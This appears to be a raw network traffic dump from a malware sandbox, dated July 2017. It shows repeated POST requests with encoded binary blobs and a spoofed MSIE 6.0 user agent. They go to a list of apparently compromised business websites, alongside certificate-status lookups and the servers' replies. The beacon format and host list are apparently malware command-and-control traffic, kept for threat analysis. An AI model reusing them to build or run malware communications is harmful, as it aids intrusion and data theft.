MeeIJ5Vp413ZcpAzfK2Z7I5q nejVMZPmTd6MbJoHAIIsyM7wxViKRoOTdbx6NRMvhvU28qzOmtUnE/1LfYvWX5/qoPZVF97gbfCjL lErvytA twCyxam93LgKm4 mm lpFqRXHoYYkrbZc3cpUBFDDjbdAta2Jwm48t7PmJREaPKRXhtJKfNuSvF2hhaTWaZUBoj2nfpZ z435AKVtDQBjQoQwgzGxRlxQfQ0lVU8jVdJlYZY1kzvqVz8sfeIMyNfzvSb3qIkhTU6xmDZr66xlysqWL3sEe4u0HpisChsOK527MKjLGO7p0l9h61 koiaH672ldRcpZDQm8c6rmKelCCQjG575einQ7QXca/OOGBzwYvuQSFXtjuIaR5OhqfB4QVzplK9uc57cusxpniWhxUN9 xY p2BODq64iXhsuC/Yg8vzGq8rtqssMX0=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2016 11:53:19 GMT
ETag: "8106e37c-79-52f42cab9c12b"
Accept-Ranges: bytes
Content-Length: 121
Vary: Accept-Encoding
Content-Type: text/html
X-Varnish: 1067703876
Age: 0
Via: 1.1 varnish (Varnish/5.1)
Connection: keep-alive
<META .     HTTP-EQUIV="Refresh".     CONTENT="0; URL=hXXp://VVV.co
lourprint-veenendaal.nl/">.<title>ColourPrint</title>.H
TTP/1.1 200 OK..Date: Sat, 01 Jul 2017 11:16:38 GMT..Server: Apache..L
ast-Modified: Wed, 30 Mar 2016 11:53:19 GMT..ETag: "8106e37c-79-52f42c
ab9c12b"..Accept-Ranges: bytes..Content-Length: 121..Vary: Accept-Enco
ding..Content-Type: text/html..X-Varnish: 1067703876..Age: 0..Via: 1.1
varnish (Varnish/5.1)..Connection: keep-alive..<META . HTTP-EQ
UIV="Refresh". CONTENT="0; URL=hXXp://VVV.colourprint-veenendaal.n
l/">.<title>ColourPrint</title>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shipeliteexpress.com
Connection: Keep-Alive
Cache-Control: no-cache

JOiKRcjNnW5/nDZnCxb40jvgMP9Q5LfDfP2SAhUsd8DPFruWZzx32d9vHLwLmZ6fz6WgE4xkEj6mUK6AByYgGGOqQuPqNoPyW2eJ wFKUlO63XDlr0WvGv0UbIdCgiLc6f4yVzvOWh 2oOSzPTkFQ8vBFU6VitWjkxeUDcvxhaoqoeS9S18zuqTMeylyeCJNiUMJeJXYz1crj4cq5 hgZDxBpgBFUMz30np24MrlaOvWV0pylhOJ03/e6WXR7E6/3e2VONXIlS9Q4gzZ41uhS6AE7M4oALImD3mDiZH7TOufUDkvDYAK22c6yGamP3XUxhYja F9thrvng50iL7LDd5XXnzH3eoWWX6cRdVpibCcci5FQBsnL9PXQtDpPLLCj37NbSWDQ258TTKkpFxTw8UkONn8PFJpmXu9/BQW4AA0EMmvKmCcMPs=
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.shipeliteexpress.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:56 GMT
Content-Length: 155
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.shipeliteexpress.com/">here</a></bod
y>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=
UTF-8..Location: hXXp://VVV.shipeliteexpress.com/..Server: Microsoft-I
IS/8.5..X-Powered-By: ASP.NET..Date: Sat, 01 Jul 2017 11:16:56 GMT..Co
ntent-Length: 155..<head><title>Document Moved</title&g
t;</head>.<body><h1>Object Moved</h1>This docu
ment may be found <a HREF="hXXp://VVV.shipeliteexpress.com/">her
e</a></body>..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: orion-networks.net
Connection: Keep-Alive
Cache-Control: no-cache

5BaCoE5X510SLrZo2XaVtLHReINOuxm6YoynnIjARlm0wX0Nif0H HwWn45sFpiLssCDNydfx8wkHHLlfJZQYbSKOZOOIOR65PhhZ00is3ZIL6XtZq8vwnkrVzm4r8LhWyCn9QrlDY4CPdS7B3nm9KUWBO04w808SYf0oCje4a FtholoNh mOU5KiDdIqpSB2AOaO3SfKl3Bej8FY9Uhg1xtuhUFHk15OK11xh5CpuWH6uZqR8DoYLlHCPfnukcrBHgx25tn66msulQ5CIWebfa0Sc9aGU 5CsN3WUkKSPUiOI4U3l/GkdWoB6ceTifi2eCVj5eAXaVMMBrCUwXVpj/R48VHTZ3XmMZbialOBh9ti6O4JEtv3ziUTj0LLt8RhDVInJKMbMWu VfyDFuV8Mi9Cfaw B6thu5gMbtY2uzORtxXcnYYN3CY26WMM0YqDxYcI m8MCVUhYlUqHOf10hWJqN8LnHecom6c38QJs=
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
304c..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN
". "hXXp://VVV.w3.org/TR/html4/loose.dtd">.<html>.<
head>.<title>Washington's Telephone & Cabling Company - O
rion Networks</title>.<META name="description" content="The W
ashington, DC area's premiere Telephone System and Data Network compan
y. We wire your office with voice and data cabling networks and provi
de Nortel Business Phone Systems, Cross Connect services, Refurbish Ph
one Systems">.<META name="keywords" content="Washington DC, Nort
hern Virginia, Maryland, office cabling, business Telephone systems, D
ata, Network, Nortel, BCM, phone system, cat5, voicemail, computer net
work, Apple Machintosh, office computer network, phone system">.<
;meta http-equiv="Content-Type" content="text/php; charset=iso-8859-1"
>.<script type="text/javascript" src="includes/menus.js"><
/script>.<link href="includes/style.css" rel="stylesheet" type="
text/css">.<body>..<table cellpadding="0" cellspacing="0"
border="0" bordercolor="green" width="100%" class="bg">.<tr>.
.<td width="766" height="120" valign="top" class="bg_main_1" colspa
n="2"><img src="images/spacer.gif" width="1" height="120" alt="W
ashington DC Phone Systems and cabling">...<div id="chromemenu"&
gt;....<ul>.....<li><a href="index.php">Home</a&g
t;</li>.....<li><a href="products.php" onMouseover="css
dropdown.dropit(this,event,'dropmenu1')">Products</a><

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hinnenwiese.de
Connection: Keep-Alive
Cache-Control: no-cache

uPzmBhkoS36ltN3tKPKqgrKfzq13Lz3JXTyK2aHyqHRVvbDUM/8oyNQoaeM4nNvGc5 WdD1 wA/8Y5 DHEOA57mALxFV2BOMo3lFQ4jjHwpaJTgU7GZMh1c/XMv9bEdJOrs zm 8qf5jqCdwBL9rpVcS/voLtPqMDTUwBS36dNSz/j4pnx7cArcUNeyOP5/jRdr8lYMZPSyXC0MYJdvKsl3oD0wgTUVWJbb3kaOwoNV0yJanjj2ekeO z/TX9C4/nQMqVbbq1dlGsDaBBqjnIVuyXII vlTqbEVgamGvT5tHzM5pbuHS4s/323XXorqgIykOAtZ1ZiCx20WkaHp2OL77Rnwy7Eh4GKnReSKMry6yHaQymac6Lci2FsX  ybgdwzZvjtELVhIgFG OFDkjJu37xrNFmQN3T2FAzRdCxz5c6R/o1kAPdZ9RUWupFUOTTk7uISTgpvbf/E0uQtnQgis0yQ=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:16 GMT
Server: Apache
Content-Length: 209
Keep-Alive: timeout=2, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.<br />.</p>.</body>&
lt;/html>.HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:17:16 G
MT..Server: Apache..Content-Length: 209..Keep-Alive: timeout=2, max=10
00..Connection: Keep-Alive..Content-Type: text/html; charset=iso-8859-
1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&g
t;<head>.<title>403 Forbidden</title>.</head>&
lt;body>.<h1>Forbidden</h1>.<p>You don't have per
mission to access /.on this server.<br />.</p>.</body&g
t;</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: berkshirebusiness.org
Connection: Keep-Alive
Cache-Control: no-cache

JAXDPA4a5F0pQ3i9mdrDbnFmUjEOxZJgIhNMe81UhPwr6s Seq7tsrEnOS7xI6a1NvDOIfCslHIW7MlSb8XfEy l4N8SXd09xsoBVTEOFQ0tsttJOYB1ZSZJITz/9PKKJqAJSO1US4cFFoIR39lRtJfXHFjgNvfh9TBVEaOjrk v7UEBJhY0PcK0mcVSnz74ZrS2F1YNgCPMKOp7wY6DTfyKxtuq/44NIMyYl9y66OY5em8QSmk/lehJIpBYQgButNPO1lKzLns/Zmi/lfCaYn77CcmuHJZZbiIC7S8aC6obsvaBjGCeuNImzXGd3oj373bEX8tJlhXyafCPX218IOc9nbfZvX4Te8A hW1b3gUSOw4Z5G3q5w/lFUGDYaUu9w8ZvFPtiIY q7f9o ArmYJRBaK2BTjYR7PryNTdoOctmOv4ZJpvfLBogNYIK9M4UlioDweQ48zDr5Ydnzvi/cvYx0BfVOtsz0OOIgtl7WScYuUZlUz1CCEcyL4mAfQPSVBC5fo=
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 1564
Connection: keep-alive
Status: 404 Not Found
X-Request-Id: df10f633-bf7f-4c65-a763-ffe343a9896d
X-Runtime: 0.001270
X-Powered-By: Phusion Passenger 4.0.53
Date: Sat, 01 Jul 2017 11:19:19 GMT
Server: nginx/1.6.2   Phusion Passenger 4.0.53
<!DOCTYPE html>.<html>.<head>.  <title>The pag
e you were looking for doesn't exist (404)</title>. <meta na
me="viewport" content="width=device-width,initial-scale=1">. <s
tyle>. body {. background-color: #EFEFEF;. color: #2E2F30;.
text-align: center;. font-family: arial, sans-serif;. margin:
0;. }.. div.dialog {. width: 95%;. max-width: 33em;. margi
n: 4em auto 0;. }.. div.dialog > div {. border: 1px solid #CCC
;. border-right-color: #999;. border-left-color: #999;. borde
r-bottom-color: #BBB;. border-top: #B00100 solid 4px;. border-to
p-left-radius: 9px;. border-top-right-radius: 9px;. background-c
olor: white;. padding: 7px 12% 0;. box-shadow: 0 3px 8px rgba(50
, 50, 50, 0.17);. }.. h1 {. font-size: 100%;. color: #730E15;.
line-height: 1.5em;. }.. div.dialog > p {. margin: 0 0 1em
;. padding: 1em;. background-color: #F7F7F7;. border: 1px sol
id #CCC;. border-right-color: #999;. border-left-color: #999;.
border-bottom-color: #999;. border-bottom-left-radius: 4px;. b
order-bottom-right-radius: 4px;. border-top-color: #DADADA;. col
or: #666;. box-shadow: 0 3px 8px rgba(50, 50, 50, 0.17);. }. <
/style>.</head>..<body>. <!-- This file lives in pu
blic/404.html -->. <div class="dialog">. <div>.
<h1>The page you were looking for doesn't exist.</h1>.
<p>You may have mistyped the address or the page may hav

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: churchsupplies.net
Connection: Keep-Alive
Cache-Control: no-cache

aRYhesOZF3ZPr// ynTwpuy8zt9peyafp/tBYjg54MX95YJZQxpNRW BPEHiyo6LA6SsYjFkplycXUYtTeH vU/fr0a/YmWcpMb4/qku6w7cAGTBwp/8OjA3Tni09HYSjvKZy x1G1EmNFNte2r3EYkUJj4ZlEY6ClWySqGL7CbRV5q0oJY36ZjVK4 uxfaVHS7OukgBEP6Q9jSvq5XOCQ6PEcwQF3dp1ijZkNxkXNANWxnOi9mATb/fE9VVLjXRE0F5yHOlzKd0IGGzFc6RqcQcbzPeAZz16DpHHHYMHUdY16B/X nurwh7G9PNV3KGj1U0mUWKUR4 BxidzUCN1iUkEIQ6Ot1plbIl2zRspbReEeriqOmOK1PMUYNy xixYVymrmM8Xp7tAmM5Xez A4dXXMsUoLdq/I9BFLtEyk2EE8giWsJK9wYWciJH3r5ROoTLo8b3FZvW5eNlBRnIvzSV5xsccWB2/5Y6FI7n7BkKsp 6eAA8XuVkpQqxJMB2yVMFDBEQ
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:06 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4961
Keep-Alive: timeout=2, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left:
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: combine.or.id
Connection: Keep-Alive
Cache-Control: no-cache

zhSy1pamioIGtfAdcSx/YDkIhjM2oMdBKqy5uiNh7jlhudqu1cRMH9VKTJg2xpt/ IhSk5kiSf3qEomyXNhNhpWyVyja0pYio URkCoILyAVc2aqEr3XP4wa6KuU8XyRtEO/Mv9gjH9SLlUSw3yffwNO37j3CSKDeCIS/t2/4NoFh28rOBsnBT3E3AknMByH5IURKj61VxAxC6yyIzPxYZvGiy4po5QOJAHII3rA2ub17IIeE2Dil7R/lsqQsGSCD42N4U16pEWzSBV6aC1 0WZ/WWo1HZcGlxpHrTRe2CIs1nXNGJoLOCKJh7gFLn9KHg24lVpVkDE7rRCeqkmcu5zvkdc29XIWasjSfTN26t9kei4aY1sneWrAIS3zBTLH6AnR1IsldaPSyEgEiMgKaj7jrBNYzyPxGiiFlmQalH72i91KK3qZuzBWB1vl6LXWkExf0i7SKTH/mSrwPrIsVMOxG1HA/l9qXGnXpT4=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 10:55:23 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_python/3.5.0- Python/2.7.5
X-Powered-By: PHP/5.4.16
X-Pingback: hXXp://VVV.combine.or.id/xmlrpc.php
Location: hXXp://VVV.combine.or.id/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 10:55:23 GMT
..Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PH
P/5.4.16 mod_python/3.5.0- Python/2.7.5..X-Powered-By: PHP/5.4.16..X-P
ingback: hXXp://VVV.combine.or.id/xmlrpc.php..Location: hXXp://VVV.com
bine.or.id/..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..T
ransfer-Encoding: chunked..Content-Type: text/html; charset=UTF-8..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: istanbultarim.com.tr
Connection: Keep-Alive
Cache-Control: no-cache

0eQf9PosEmKxs4Twndiw2T2wKdpqgGxVzsYEqlRJ96zb3Qw3KaOerN62wv5OG7ORpTdO3ddkyvUK5u1198unRMbSd2PREziLNStGi4OxM7y vS9 Uor1sot4cYyNipXF Y/TupQchrdwrR2vhO8FJIZfdVvq0pjY7UaO/EZK6IqE7 jwykejTGWGtG5vVWge7MqV8ij5wDBLUSD8 s5VANT/zoH 4UVuFBvJO9qez/Xagaim/Zvp46luBuVXbxNBHomdPwP 1F oGGD9sKmnmfzxhFgJphLfJ3731qd4YRpi7p1afGt QprudGXsSvEV5Lmr28OBAfH JF5a0PPih 21962 h2ev4KRdNJV 1Uu/GjWchwFx1hphtwIKNoNst 6jAeW6nLsgQix/YyFd4Bre/JX0XN6c7G476tRrUTpdSkI4yqnmmoUtcn6vTe7Igrc7vA4KEz8OIUGYOF7nSa6b6oE3bDlx8Rug7g9Vhb GdjHQ/Vgy2MRiCcYksXptw2y4uZTfbiLuXrpAlzSoGQ==
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d5cb14ea9569a874c825f4bdff9074e8c1498907802; expires=Sun, 01-Jul-18 11:16:42 GMT; path=/; domain=.istanbultarim.com.tr; HttpOnly
Location: hXXp://VVV.istanbultarim.com.tr/
Server: cloudflare-nginx
CF-RAY: 3778f46837a5821f-KBP
135..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://VVV.istanbultarim.com.tr/"&g
t;here</a>.</p>.<hr>.<address>Apache Server at
istanbultarim.com.tr Port 80</address>.</body></html&g
t;..1.....0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11
:16:42 GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Enco
ding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d5cb14ea95
69a874c825f4bdff9074e8c1498907802; expires=Sun, 01-Jul-18 11:16:42 GMT
; path=/; domain=.istanbultarim.com.tr; HttpOnly..Location: hXXp://www
.istanbultarim.com.tr/..Server: cloudflare-nginx..CF-RAY: 3778f46837a5
821f-KBP..135..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
;.<html><head>.<title>301 Moved Permanently</titl
e>.</head><body>.<h1>Moved Permanently</h1>
.<p>The document has moved <a href="hXXp://VVV.istanbultarim.
com.tr/">here</a>.</p>.<hr>.<address>Apache
Server at istanbultarim.com.tr Port 80</address>.</body>&
lt;/html>..1.....0..

<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDH18gSiIK8Jg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=122723, public, no-transform, must-revalidate
Last-Modified: Sat, 01 Jul 2017 11:09:54 GMT
Expires: Sun, 02 Jul 2017 23:09:54 GMT
ETag: "56414c7e3be0eeb44a213be27f76c7bb9888be7a"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1777
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20170701110954Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,............&....20170701110954Z....2017070
2230954Z0...*.H................."..k?.S..aN....=.T. .# ....c.q>|9.g
...C....J.);..H.sL.1..6..]..G5.....9b..a)8.......~uI.f59...v..Q.C.....
v...y..i%....Y/...5!.N7.3QG.....&..Z.iE..h.D...yt....[............el.&
lt;*.7;.D8/..;.G.K.Z...,LF.. ...W.....Vh.....}...~2..a.&..,.q.y..c...)
....Np.$......0...0...0..........3....xXc0...*.H........0..1.0...U....
US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1
-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secu
re Certificate Authority - G20...161213070000Z..171213070000Z0x1.0...U
....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1
0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0..
...........}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9........_N
."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt.v.UN..
.%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...X...( .
.z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}..........0..
0...U.......0.0...U...........0...U.%..0... .......0...U........J!~...
}....^].....0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com
/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000...
........"hXXp://crl.godaddy.com/repository/0...*.H.............&..

<<< skipped >>>

GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8D4g HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:58 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=d9ca3fc5442088f0fdfb94f68094ae56d1498907818; expires=Sun, 01-Jul-18 11:16:58 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sat, 01 Jul 2017 09:13:35 GMT
Expires: Wed, 05 Jul 2017 09:13:35 GMT
ETag: "9177709b44b75bf5614518c53734b9b1eb7aabb1"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 3778f4ca465b8436-KBP
0..........0..... .....0......0...0.......m.1.K..}$. ....?o....2017070
1091335Z0n0l0D0... .........W......#....*..2..1..`{f.E....P/}..4....K.
.......DN.> ....20170701091335Z....20170705091335Z0...*.H..........
......4. ..Y39.s..._.....m.X.8...c.n]...Y.B#.......k..M|.t.......(z..
>.......G..z..j.!._/.?.<..05*..%...|.zF.@.w.N......k./.e.A...y..
u.............sl.....I9F..R<...I..(.)?(..p..7<._..i....:*e.X.N.|
e.k..W..al...................../<h...JD.y.&?.....4.N.6..U$=."....0.
..0...0..........H.....x.....V.0...*.H........0W1.0...U....BE1.0...U..
..GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...1
70507000000Z..170815000000Z0[1.0...U....BE1.0...U....GlobalSign nv-sa1
10/..U...(GlobalSign OCSP for Root R1 - Signer 1.20.."0...*.H.........
....0.........^..99..`h..t......q......0...(g.r5..d.).K.@.\...D..x....
t.|g&{x.F..Q.(..<_..!..... ...E....?L%...wD.o}qH{B...1.?is..3..*...
.sV.D....'5.e..9...o..i..y.hV.6.#.c.q|.0...:t..'...&B..B` ..D1s;..!..P
.z..|.f.*...j...&.vw.....DJ....c$=*^..?.).m..0S 6.....................
0..0...U...........0...U.%..0... .......0...U.......0.0...U.......m.1.
K..}$. ....?o..0...U.#..0...`{f.E....P/}..4....K0... .....0......0L..U
. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/reposito
ry/0...*.H................>.f..wt.b.I/6U.w.S:O.N..v...-w.........r.
..R.............a.Z....x9..=.;."s<B{.U(%.M..J!O*......c.1....GH.\[d
p....R.......(....oT.V.G..sl8.F...9..6..I..o9M.:;..`...*=),....jd...q.
g.9...y.....g....B......V&.b..k...O2....=..-..!.|0x.."..i......,N.

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: topex.ro
Connection: Keep-Alive
Cache-Control: no-cache

ZvpBjmLlrXbsw0MS1aU68 XM xnyJOsWtgnFqtj VhwadWKsv9T8VnqAZKkMeHe9D1BerdQFZlRX75TW9G vfptoWisuzxtnIkgbOjiy01saCRwu92Gct4RtmHCrnsE4IjQUhkCwx VKLTLJ1EbLiUPTNJ2KKBT6c6xRD9QWusNJ9I191wkn21v/x42ZWSCgJljt9mBGgLgGE31hgdvj/MVVgLbAYJlisnbVLqXtFTRtw3c9zlrBugmlVwjhUNetsLB2yovfqhDj L/8HBUCz2RP6He03uD/xbMk2aY07wzfv9NEhnB26Z0BJLbBLvTruNdC9X18LVjEmm2xneLqNmQV9pt1EulmLNDLmmaktX/BkMPhzwhEq JqaKjUjTSkrIICxdvpDrokeg0ePvsBG/x cPtvTOuBWkKcJ3E87KT8t82h7VUkhm5AzZV6
HTTP/1.1 301 Moved Permanently
Server: Advanced Hosting by hXXp://VVV.unixy.net/advanced-hosting/varnish-nginx-cpanel/
Date: Sat, 01 Jul 2017 11:17:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Set-Cookie: bb2_screener_=1498907827 89.35.6.153 194.242.96.218; path=/
X-Pingback: 
Location: hXXp://VVV.topex.ro/
X-Cacheable: YES
Accept-Ranges: bytes
X-Varnish: 445536026
Via: 1.1 varnish
age: 0
X-Cache: MISS
X-Cache: HIT from Backend
HTTP/1.1 301 Moved Permanently..Server: Advanced Hosting by hXXp://www
.unixy.net/advanced-hosting/varnish-nginx-cpanel/..Date: Sat, 01 Jul 2
017 11:17:07 GMT..Content-Type: text/html; charset=UTF-8..Content-Leng
th: 0..Connection: keep-alive..Set-Cookie: bb2_screener_=1498907827 89
.35.6.153 194.242.96.218; path=/..X-Pingback: ..Location: hXXp://VVV.t
opex.ro/..X-Cacheable: YES..Accept-Ranges: bytes..X-Varnish: 445536026
..Via: 1.1 varnish..age: 0..X-Cache: MISS..X-Cache: HIT from Backend..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: merceorti.com
Connection: Keep-Alive
Cache-Control: no-cache

bFE18Kmd4V1iNA5heEo2S8L74QFHPHfC7bro4r8YiwpVRhDcOxIk5uucbDlUhyzifKemwg/RF6r0n9Ow28Ykwmts MJ5cdwo82r0zVhxdIu8G5pGiPoJWhw/iklvtyT3YbxsZSP0vylEfLT/Fg7JyQRkmcmS6XnRdt2 YvdDELqZ1pHvGnQMFJtCguOLeplwuLXIflOY8c0pcIG11SS6t/Vtb6oOManMaNGa7PkLhRazvrDCK3 vXx8Booc5hAIwZhgguppe4d4IsHuBIuEwv1/oLqrvtbIX6x3sP6rcf3Qlm0q9HehPKfPDGSu5vhWo3i8CpMAhpt8qTi14ORG7rkzyLV zNCGzZqyVBd2uKZuASWzVfOvXhmFeCaEsxTUH8XybeeV0/GZQqOqcLkHkKiTwN/ odeP wAI CsG8eQJiwJkEG9KzxU/JLd0vi3LsDH6nngm0gR3r16FS0I8WrHML7whjDeey5yx3SzlVMAGqe75PWX8f
HTTP/1.1 405 Not Allowed
Server: nginx/1.5.1
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html
Content-Length: 574
Connection: keep-alive
<html>..<head><title>405 Not Allowed</title>&l
t;/head>..<body bgcolor="white">..<center><h1>405
Not Allowed</h1></center>..<hr><center>nginx/
1.5.1</center>..</body>..</html>..<!-- a padding
to disable MSIE and Chrome friendly error page -->..<!-- a paddi
ng to disable MSIE and Chrome friendly error page -->..<!-- a pa
dding to disable MSIE and Chrome friendly error page -->..<!-- a
padding to disable MSIE and Chrome friendly error page -->..<!-
- a padding to disable MSIE and Chrome friendly error page -->..<
;!-- a padding to disable MSIE and Chrome friendly error page -->..
HTTP/1.1 405 Not Allowed..Server: nginx/1.5.1..Date: Sat, 01 Jul 2017
11:16:38 GMT..Content-Type: text/html..Content-Length: 574..Connection
: keep-alive..<html>..<head><title>405 Not Allowed&l
t;/title></head>..<body bgcolor="white">..<center>
;<h1>405 Not Allowed</h1></center>..<hr><ce
nter>nginx/1.5.1</center>..</body>..</html>..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
